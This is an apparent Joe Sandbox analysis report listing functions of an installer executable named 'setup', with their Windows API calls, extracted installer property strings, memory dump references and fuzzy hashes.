                                                                                                                                                                              • Instruction ID: 6066e3b4d0c9e808e5481dcb2a852d93a40bb0aea41c3ccb8b5b1ca2f4a37e1a
                                                                                                                                                                              • Opcode Fuzzy Hash: 2f3d10f463ed65157dc91c0afef29e221eeff6a2b9c13d1818193d7463029aad
                                                                                                                                                                              • Instruction Fuzzy Hash: 46E1BC71A012059FDB10EF69CC84BBEBBE8EF45310F2441A9E915E7291DBB99D04CBA1
                                                                                                                                                                              Function 00CAA220 Relevance: 19.7, APIs: 13, Instructions: 155windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,00001036,00010000,00000000), ref: 00CAA28B
                                                                                                                                                                              • GetParent.USER32(00000000), ref: 00CAA2DE
                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 00CAA2E1
                                                                                                                                                                              • GetParent.USER32(00000000), ref: 00CAA2F0
                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00CAA2F3
                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00CAA320
                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000), ref: 00CAA35F
                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 00CAA370
                                                                                                                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00CAA386
                                                                                                                                                                                • Part of subcall function 00C5F860: IsWindowVisible.USER32(?), ref: 00C5F8DA
                                                                                                                                                                                • Part of subcall function 00C5F860: GetWindowRect.USER32(?,?), ref: 00C5F8F2
                                                                                                                                                                                • Part of subcall function 00C5F860: GetWindowRect.USER32(?,?), ref: 00C5F90A
                                                                                                                                                                                • Part of subcall function 00C5F860: IntersectRect.USER32(?,?,?), ref: 00C5F927
                                                                                                                                                                                • Part of subcall function 00C5F860: EqualRect.USER32(?,?), ref: 00C5F937
                                                                                                                                                                                • Part of subcall function 00C5F860: GetSysColorBrush.USER32(0000000F), ref: 00C5F94D
                                                                                                                                                                              • FillRect.USER32(?,?,00000000), ref: 00CAA39C
                                                                                                                                                                              • DeleteDC.GDI32(?), ref: 00CAA3BC
                                                                                                                                                                              • SendMessageW.USER32(?,00001026,00000000,000000FF), ref: 00CAA3E0
                                                                                                                                                                              • SendMessageW.USER32(?,0000108A,00000000,00000011), ref: 00CAA3F3
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Rect$Window$MessageSend$CompatibleCreateParent$BitmapBrushColorDeleteEqualFillIntersectObjectPointsSelectVisible
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2161025992-0
                                                                                                                                                                              • Opcode ID: 8451f44767c1883a8cf739999104da0c408dff9dfb61ddfadef63f7eb678577c
                                                                                                                                                                              • Instruction ID: 9a7f87527574423e637e65f6c19b83f29a66b517321fe85483955f97fa3bad98
                                                                                                                                                                              • Opcode Fuzzy Hash: 8451f44767c1883a8cf739999104da0c408dff9dfb61ddfadef63f7eb678577c
                                                                                                                                                                              • Instruction Fuzzy Hash: 04513771D00648AFDB11DFA9CD45BDEBBF8EF59710F20422AE815B72A1EB706984CB50
                                                                                                                                                                              Function 00BCF410 Relevance: 18.2, APIs: 6, Strings: 4, Instructions: 685windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00BCF4F1
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D802A8
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00BCF4AE
                                                                                                                                                                                • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
                                                                                                                                                                                • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
                                                                                                                                                                                • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
                                                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00BCFA12
                                                                                                                                                                              • SendMessageW.USER32(?,0000102B,?,0000000F), ref: 00BCFAC0
                                                                                                                                                                              • SendMessageW.USER32(?,00001003,00000001,?), ref: 00BCFB61
                                                                                                                                                                                • Part of subcall function 00CC0250: __cftof.LIBCMT ref: 00CC02A0
                                                                                                                                                                              • SendMessageW.USER32(?,0000101E,00000000,0000FFFE), ref: 00BCFD98
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake__cftof
                                                                                                                                                                              • String ID: AiFeatIco$Dj$Dj$Icon
                                                                                                                                                                              • API String ID: 2303580663-1543522245
                                                                                                                                                                              • Opcode ID: 8c2c238dfc072a730d730f4c5b790a5dfa23290ad7334e4e4f4b910ff8c53257
                                                                                                                                                                              • Instruction ID: ab5ff56faa92debad1a9537d06db11d99f01fb1e6751b7e21a96174de6330e70
                                                                                                                                                                              • Opcode Fuzzy Hash: 8c2c238dfc072a730d730f4c5b790a5dfa23290ad7334e4e4f4b910ff8c53257
                                                                                                                                                                              • Instruction Fuzzy Hash: 83623971900659DFDB24DF64CC88BEEBBF1EB59304F1441E9E44AAB291DB70AA84CF50
                                                                                                                                                                              Function 00CD1C40 Relevance: 18.1, APIs: 9, Strings: 1, Instructions: 580COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CD1DED
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CD1F92
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D802A8
                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F5,?,02141699,?,?), ref: 00CD201A
                                                                                                                                                                              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?), ref: 00CD2021
                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F5,0000000C,?,?), ref: 00CD2035
                                                                                                                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 00CD203C
                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F5,000000FF,?,00000000,?,00000000,00E1A104,00000002,?,?), ref: 00CD20CB
                                                                                                                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 00CD20D2
                                                                                                                                                                              • IsWindow.USER32(00000000), ref: 00CD2369
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ConsoleHandle$AttributeCriticalInit_thread_footerSectionText$BufferEnterInfoLeaveScreenWindow
                                                                                                                                                                              • String ID: Error
                                                                                                                                                                              • API String ID: 2811146417-2619118453
                                                                                                                                                                              • Opcode ID: 2f8f6b5ecbe0b85695d49cdfecdc7b69b44a0f130df0320bd2eb2f0b23eaf71d
                                                                                                                                                                              • Instruction ID: 2632c7245fdb3ae3e35a9f968d0974a643e5a4992464065215fcc692579a3e99
                                                                                                                                                                              • Opcode Fuzzy Hash: 2f8f6b5ecbe0b85695d49cdfecdc7b69b44a0f130df0320bd2eb2f0b23eaf71d
                                                                                                                                                                              • Instruction Fuzzy Hash: C0428B70D00219DFDB24CF68CC45BAEBBB0BF59314F1042AAE559B7291EB746A85CF90
                                                                                                                                                                              Function 00CAA9B0 Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 367windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 00CAAC39
                                                                                                                                                                              • RedrawWindow.USER32(?,00000000,00000000,00000541), ref: 00CAAC4B
                                                                                                                                                                              • SendMessageW.USER32(?,00000443,00000000), ref: 00CAACA3
                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00CAACC7
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CAACD2
                                                                                                                                                                              • MulDiv.KERNEL32(?,00000000), ref: 00CAACDA
                                                                                                                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 00CAACFF
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$CapsCreateDeviceFontMessageRedrawSend
                                                                                                                                                                              • String ID: NumberValidationTipMsg$NumberValidationTipTitle$Segoe UI
                                                                                                                                                                              • API String ID: 367477953-2319862951
                                                                                                                                                                              • Opcode ID: c0a554d79f80420704c673020fe06dcae93ff26cf0c737bbef9ea51dd48fc4a1
                                                                                                                                                                              • Instruction ID: 426aa9ecf198101c19ab60b7a9f6535b9078ce07a526a181c5cf03bba133c13f
                                                                                                                                                                              • Opcode Fuzzy Hash: c0a554d79f80420704c673020fe06dcae93ff26cf0c737bbef9ea51dd48fc4a1
                                                                                                                                                                              • Instruction Fuzzy Hash: 39D1D331A00605AFEB14CF24CC95BEEB7F1FF49304F108699E55AA72D1DB746A49CB90
                                                                                                                                                                              Function 00BD9710 Relevance: 14.8, APIs: 1, Strings: 7, Instructions: 843windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BD975F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID: ' AND `Control_`='$AiTabPage$ControlEvent$Dialog$SpawnDialog$Title$`Dialog_`='
                                                                                                                                                                              • API String ID: 3850602802-1412757306
                                                                                                                                                                              • Opcode ID: 081976fee459dd92b9f644ee2b04dd16969bb604651d270ceacf7f7ebe5d8bfc
                                                                                                                                                                              • Instruction ID: 606eee8e5c21deeba91b9292dd73f4d324a65745a8b2cdcd9ee593723466f903
                                                                                                                                                                              • Opcode Fuzzy Hash: 081976fee459dd92b9f644ee2b04dd16969bb604651d270ceacf7f7ebe5d8bfc
                                                                                                                                                                              • Instruction Fuzzy Hash: D2728D31D00258DFDB14DF64C895BEEB7B1FF59304F148299E409AB391EB74AA84CBA1
                                                                                                                                                                              Function 00BCA820 Relevance: 13.3, Strings: 10, Instructions: 767COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $AI_DynInstances$AI_GenNewCompGuids$AI_MajorUpgrades$InstanceId$Manufacturer$OldProductCode$ProductCode$ProductVersion$UpgradeCode
                                                                                                                                                                              • API String ID: 0-614494711
                                                                                                                                                                              • Opcode ID: 0016ce505927dd8bba4d0a87f517e669788f91e8af236c6236fd0905feb677f1
                                                                                                                                                                              • Instruction ID: 01b5bf07caa283e6fa26ed7d70c81b9b118f793a6a6fb43ac2a7116ef38bdcd2
                                                                                                                                                                              • Opcode Fuzzy Hash: 0016ce505927dd8bba4d0a87f517e669788f91e8af236c6236fd0905feb677f1
                                                                                                                                                                              • Instruction Fuzzy Hash: 9B62BC31D002588BDB14CB68CC95BEEBBB1EF55304F2482DDE446B7691DB746E84CBA1
                                                                                                                                                                              Function 00CCB3A0 Relevance: 10.9, APIs: 7, Instructions: 383fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 00CCB3D9
                                                                                                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 00CCB498
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,00000000), ref: 00CCB598
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,00000000,0000002A,?,00000000), ref: 00CCB635
                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,00000000), ref: 00CCB65B
                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,00000000), ref: 00CCB6A5
                                                                                                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 00CCB729
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$_wcsrchr$CloseFileFirst
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 370096839-0
                                                                                                                                                                              • Opcode ID: 76e90f78987d194d13f5b8cb2a5e7b359199fdfc3fb5df226f4d7fb7a6047f03
                                                                                                                                                                              • Instruction ID: 6e6dcdb36f3330de4e8a028def16106fb75a5948f5a09c1919568257504d2d8f
                                                                                                                                                                              • Opcode Fuzzy Hash: 76e90f78987d194d13f5b8cb2a5e7b359199fdfc3fb5df226f4d7fb7a6047f03
                                                                                                                                                                              • Instruction Fuzzy Hash: 56C1B271A042059FDB14DFA9CC46BAEB7F8FF44324F20466EE825D7281D7759E048BA0
                                                                                                                                                                              Function 00DA3174 Relevance: 10.3, APIs: 1, Strings: 4, Instructions: 1511COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __floor_pentium4
                                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                              • API String ID: 4168288129-2761157908
                                                                                                                                                                              • Opcode ID: e8a0f3f6caa2c6640015c58db5852457941024b5fd5321e6f89cd032d6017d9d
                                                                                                                                                                              • Instruction ID: 3811d6198c6c290a9c9017afb4ebcdfdfbf78aa356efc60ebc62c5b680ee863a
                                                                                                                                                                              • Opcode Fuzzy Hash: e8a0f3f6caa2c6640015c58db5852457941024b5fd5321e6f89cd032d6017d9d
                                                                                                                                                                              • Instruction Fuzzy Hash: B4D23C71E082288FDB65CF28DC407EAB7B5EB86314F1845EAE44DE7240D774AE858F61
                                                                                                                                                                              Function 00D7F896 Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000C,00D7F7B2,00000000,?,00D7F94A,00000000,?,?,00BB8164,?), ref: 00D7F898
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,?,?,00BB8164,?), ref: 00D7F8BF
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F8C6
                                                                                                                                                                              • InitializeSListHead.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F8D3
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00BB8164,?), ref: 00D7F8E8
                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F8EF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1475849761-0
                                                                                                                                                                              • Opcode ID: b8388a6902e59a8ae240f1d3d175cc0e65c70fc1a13d590b55eb4f2920c65cb9
                                                                                                                                                                              • Instruction ID: aaa7302cbc80432ba9c6d3cc009c2f6a3e5db9f3acee5ac09d83a4ccde6d1afd
                                                                                                                                                                              • Opcode Fuzzy Hash: b8388a6902e59a8ae240f1d3d175cc0e65c70fc1a13d590b55eb4f2920c65cb9
                                                                                                                                                                              • Instruction Fuzzy Hash: C7F04F71741602DFE7209F7AAC08B1676E8EF99712F244539F945E3250EB31C845CA71
                                                                                                                                                                              Function 00BC9FF0 Relevance: 6.8, Strings: 5, Instructions: 567COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer
                                                                                                                                                                              • String ID: AI_EXIST_INSTANCES$AI_EXIST_NEW_INSTANCES$MultipleInstances$MultipleInstancesProps$PropertyValue
                                                                                                                                                                              • API String ID: 1385522511-2308371840
                                                                                                                                                                              • Opcode ID: 7bca596a8140de24998419c1c6257e01f0f6c55c2edd160d9226bc1d4f0e71f5
                                                                                                                                                                              • Instruction ID: 07933f9b3c5a5207e734ef576cb7e89a294cfa668d07c1fb7441bdb92cb1a7dd
                                                                                                                                                                              • Opcode Fuzzy Hash: 7bca596a8140de24998419c1c6257e01f0f6c55c2edd160d9226bc1d4f0e71f5
                                                                                                                                                                              • Instruction Fuzzy Hash: B622A070D10248DFDB18DFA4C899BEEBBB1EF45304F24829DE405B7291DB746A85CBA1
                                                                                                                                                                              Function 00D9830B Relevance: 6.3, APIs: 4, Instructions: 337COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _strrchr
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3213747228-0
                                                                                                                                                                              • Opcode ID: a4473bbf9f503decba0e7483b31eca65fff1e717c1630b579ce9787749cead10
                                                                                                                                                                              • Instruction ID: b64f33c7dd2f8f3d871affd926975a1cbde4b8486bc4ae3318eb8fa6b6afbaa9
